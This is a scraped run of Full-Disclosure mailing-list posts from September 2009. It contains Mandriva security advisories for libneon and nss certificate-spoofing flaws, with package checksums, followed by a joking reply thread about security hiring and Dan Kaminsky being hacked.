-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:228 http://www.mandriva.com/security/ ___ Package : libneon Date: September 10, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in neon: neon before 0.28.6, when OpenSSL is used, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408. (CVE-2009-2474) This update provides a solution to this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2474 ___ Updated Packages: Mandriva Linux 2008.1: 1123e36a897efa834a3e0d36460dcc33 2008.1/i586/libneon0.24-0.24.7-21.2mdv2008.1.i586.rpm 3684425df6598f1a7c86aed6f286d2e7 2008.1/i586/libneon0.24-devel-0.24.7-21.2mdv2008.1.i586.rpm ccea87a2cc2d93b87d914be1b4505a37 2008.1/i586/libneon0.24-static-devel-0.24.7-21.2mdv2008.1.i586.rpm ca5680df443981778142576a68d9a8b1 2008.1/i586/libneon0.26-0.26.4-5.2mdv2008.1.i586.rpm 9b90410422324514c0b0645163118c9a 2008.1/i586/libneon0.26-devel-0.26.4-5.2mdv2008.1.i586.rpm ae76995f7d095331ed5773a584b2a73c 2008.1/i586/libneon0.26-static-devel-0.26.4-5.2mdv2008.1.i586.rpm dc1d23f9ec9b449893456baec8b6700b 2008.1/SRPMS/libneon0.24-0.24.7-21.2mdv2008.1.src.rpm effe8d01bc8e9663dbe61a92849eb340 2008.1/SRPMS/libneon0.26-0.26.4-5.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 74220dd3794599f93a762ac96cdb4f2a 2008.1/x86_64/lib64neon0.24-0.24.7-21.2mdv2008.1.x86_64.rpm e357492501ef388e756780aea057aa0e 2008.1/x86_64/lib64neon0.24-devel-0.24.7-21.2mdv2008.1.x86_64.rpm 099adbe063ff402b5f79b96aee7d28f4 2008.1/x86_64/lib64neon0.24-static-devel-0.24.7-21.2mdv2008.1.x86_64.rpm 491e88176c331b8b33850dc4ff4cf11b 2008.1/x86_64/lib64neon0.26-0.26.4-5.2mdv2008.1.x86_64.rpm dd9b2e3e919f69cb10150ff0ce4c5559 2008.1/x86_64/lib64neon0.26-devel-0.26.4-5.2mdv2008.1.x86_64.rpm 426db2bebd6206115e358b779f62f117 2008.1/x86_64/lib64neon0.26-static-devel-0.26.4-5.2mdv2008.1.x86_64.rpm dc1d23f9ec9b449893456baec8b6700b 2008.1/SRPMS/libneon0.24-0.24.7-21.2mdv2008.1.src.rpm effe8d01bc8e9663dbe61a92849eb340 2008.1/SRPMS/libneon0.26-0.26.4-5.2mdv2008.1.src.rpm Mandriva Linux 2009.0: 4f9454779e532e76d530121b2efed153 2009.0/i586/libneon0.26-0.26.4-6.2mdv2009.0.i586.rpm a86b602efd802fe0a90756c54a4cfee6 2009.0/i586/libneon0.26-devel-0.26.4-6.2mdv2009.0.i586.rpm 2fbae1ec8948843b455b53463f5f216d 2009.0/i586/libneon0.26-static-devel-0.26.4-6.2mdv2009.0.i586.rpm ecc22290b29644dd7459c2aefe5d5de4 2009.0/SRPMS/libneon0.26-0.26.4-6.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 077026afcdf0c1e1d09fe098c340a85c 2009.0/x86_64/lib64neon0.26-0.26.4-6.2mdv2009.0.x86_64.rpm 91127afa4a80debcfcd49f0a19a0e442 2009.0/x86_64/lib64neon0.26-devel-0.26.4-6.2mdv2009.0.x86_64.rpm 7caf316e8079d30ca90b96903ba1702a 2009.0/x86_64/lib64neon0.26-static-devel-0.26.4-6.2mdv2009.0.x86_64.rpm ecc22290b29644dd7459c2aefe5d5de4 2009.0/SRPMS/libneon0.26-0.26.4-6.2mdv2009.0.src.rpm Mandriva Linux 2009.1: f94b7b03b28ebdc4ece54b601460bd4f 2009.1/i586/libneon0.26-0.26.4-6.2mdv2009.1.i586.rpm 0ab62c5b0622e2e3cd1f78347cc04e41 2009.1/i586/libneon0.26-devel-0.26.4-6.2mdv2009.1.i586.rpm f340831b1373206f3f740e5d51f8c10a 2009.1/i586/libneon0.26-static-devel-0.26.4-6.2mdv2009.1.i586.rpm 746a811c1e5a3f119c57c2921fda7073 2009.1/SRPMS/libneon0.26-0.26.4-6.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: e8cc5d7d17190643ab468bd1624db6a8 2009.1/x86_64/lib64neon0.26-0.26.4-6.2mdv2009.1.x86_64.rpm 4d2649aa3c3db0e734267c5eba3eb248 2009.1/x86_64/lib64neon0.26-devel-0.26.4-6.2mdv2009.1.x86_64.rpm 19ca5a647425e4db9af287de0e21bb69 2009.1/x86_64/lib64neon0.26-static-devel-0.26.4-6.2mdv2009.1.x86_64.rpm 746a811c1e5a3f119c57c2921fda7073 2009.1/SRPMS/libneon0.26-0.26.4-6.2mdv2009.1.src.rpm Corporate 3.0: d27dbab058c8fa431ddb2d6dc0b9a274 corporate/3.0/i586/libneon0.24-0.24.7-1.1.101mdk.i586.rpm fae249ec7fa3c2621b120e7cea01a211 corporate/3.0/i586/libneon0.24-devel-0.24.7-1.1.101mdk.i586.rpm a51842a47dd9e123f9f51d2c4d82daaa corporate/3.0/i586/libneon0.24-static-devel-0.24.7-1.1.101mdk.i586.rpm 6aac5b1670a6d20c6142b84ff9e96a51 corporate/3.0/SRPMS/libneon-0.24.7-1.1.101mdk.src.rpm Corporate 3.0/X86_64:
[Full-disclosure] [ MDVSA-2009:197-2 ] nss
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:197-2 http://www.mandriva.com/security/ ___ Package : nss Date: September 11, 2009 Affected: 2008.1 ___ Problem Description: Security issues in nss prior to 3.12.3 could lead to a man-in-the-middle attack via a spoofed X.509 certificate (CVE-2009-2408) and md2 algorithm flaws (CVE-2009-2409), and also cause a denial-of-service and possible code execution via a long domain name in X.509 certificate (CVE-2009-2404). This update provides the latest versions of NSS and NSPR libraries which are not vulnerable to those attacks. Update: This update also provides fixed packages for Mandriva Linux 2008.1 and fixes mozilla-thunderbird error messages. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404 ___ Updated Packages: Mandriva Linux 2008.1: a4551a03a7c40cce16b0636c62e70c04 2008.1/i586/libnss3-3.12.3.1-0.2mdv2008.1.i586.rpm 6debdb70bfced1ce40ddc59f78bf6151 2008.1/i586/libnss-devel-3.12.3.1-0.2mdv2008.1.i586.rpm 60074051e11f1d454b9573564242eccf 2008.1/i586/libnss-static-devel-3.12.3.1-0.2mdv2008.1.i586.rpm 2986b2dfbd706c6ae33f69652c0b084e 2008.1/i586/nss-3.12.3.1-0.2mdv2008.1.i586.rpm 9eb569a34f2328ae0646a7134d4f1248 2008.1/SRPMS/nss-3.12.3.1-0.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f5e47750b4783d42d1290114b9c3d8d8 2008.1/x86_64/lib64nss3-3.12.3.1-0.2mdv2008.1.x86_64.rpm 72ed9a236283f342b97f5c49df19c404 2008.1/x86_64/lib64nss-devel-3.12.3.1-0.2mdv2008.1.x86_64.rpm 4ae51a359c93f2ff40a0c5c40049e36d 2008.1/x86_64/lib64nss-static-devel-3.12.3.1-0.2mdv2008.1.x86_64.rpm 0b2b4d83d403e333202631390b4b0c58 2008.1/x86_64/nss-3.12.3.1-0.2mdv2008.1.x86_64.rpm 9eb569a34f2328ae0646a7134d4f1248 2008.1/SRPMS/nss-3.12.3.1-0.2mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKqnSRmqjQ0CJFipgRAvoqAKDqdaKq2IZf/ozW7gHHNEbKd99wVQCcDnYZ j1yF0NZxDIVL/Zy32hAapJI= =AOUa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
On Fri, 11 Sep 2009 17:27:53 +0100 valdis.kletni...@vt.edu wrote: On Fri, 11 Sep 2009 12:23:17 +0200, D-vice said: you the fuckard that got owned You're just jealous that Dan is well-known enough to be a target, would one not rather hire someone *not* well-known and *doesn't* get owned? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
On Fri, 11 Sep 2009 21:49:00 BST, you said: would one not rather hire someone *not* well-known and *doesn't* get owned? Feel free to hire that guy flipping burgers at McD's to do your security assessment. Let me know how it turns out. Also, remember that there is an asymmetric component to this - the sysadmin has to stop *every* attack to remain un-owned, but the attacker only needs one. And there's always the security is tradeoffs component - Dan's a smart guy, and knows he can't secure every server perfectly. So he figures out what he has to do to limit the likelyhood, and takes his chances. If you estimate that a server of yours will be hacked once every year, and cost you $1,200 to clean up, then if you're spending more than $100/month in security you're being an idiot. Especially if you can do good PR spin on it: I'm Dan Kaminsky - hated by hackers the world over. Our systems average 25,392 attacks per day, and in 4 years only one has gotten through. If we can do that when under attack by the worst the world has to offer, imagine what we can do for *your* business. :) pgpDbIdeMEdKH.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote: On Fri, 11 Sep 2009 21:49:00 BST, you said: would one not rather hire someone *not* well-known and *doesn't* get owned? Feel free to hire that guy flipping burgers at McD's to do your security assessment. the burger flipper would be the obvious choice, young and eager to learn. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
full-censors...@hushmail.com wrote: On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote: On Fri, 11 Sep 2009 21:49:00 BST, you said: would one not rather hire someone *not* well-known and *doesn't* get owned? Feel free to hire that guy flipping burgers at McD's to do your security assessment. the burger flipper would be the obvious choice, young and eager to learn. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The choice is obvious only as long as you ignore the fact that eager to learn also means eager to make mistakes. After all, isn't trying (and failing) the most effective method of learning? --Rohit Patnaik ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
Rohit Patnaik wrote: full-censors...@hushmail.com wrote: On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote: On Fri, 11 Sep 2009 21:49:00 BST, you said: would one not rather hire someone *not* well-known and *doesn't* get owned? Feel free to hire that guy flipping burgers at McD's to do your security assessment. the burger flipper would be the obvious choice, young and eager to learn. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The choice is obvious only as long as you ignore the fact that eager to learn also means eager to make mistakes. After all, isn't trying (and failing) the most effective method of learning? --Rohit Patnaik But how does spitting on a router help to secure it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
If you spit on it in just the right spot, you will have created a brick-wall - an oft underappreciated network device that both livens the décor of any datacenter and obviates the need for most security practices. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of mrx Sent: Friday, September 11, 2009 6:58 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail Rohit Patnaik wrote: full-censors...@hushmail.com wrote: On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote: On Fri, 11 Sep 2009 21:49:00 BST, you said: would one not rather hire someone *not* well-known and *doesn't* get owned? Feel free to hire that guy flipping burgers at McD's to do your security assessment. the burger flipper would be the obvious choice, young and eager to learn. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The choice is obvious only as long as you ignore the fact that eager to learn also means eager to make mistakes. After all, isn't trying (and failing) the most effective method of learning? --Rohit Patnaik But how does spitting on a router help to secure it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
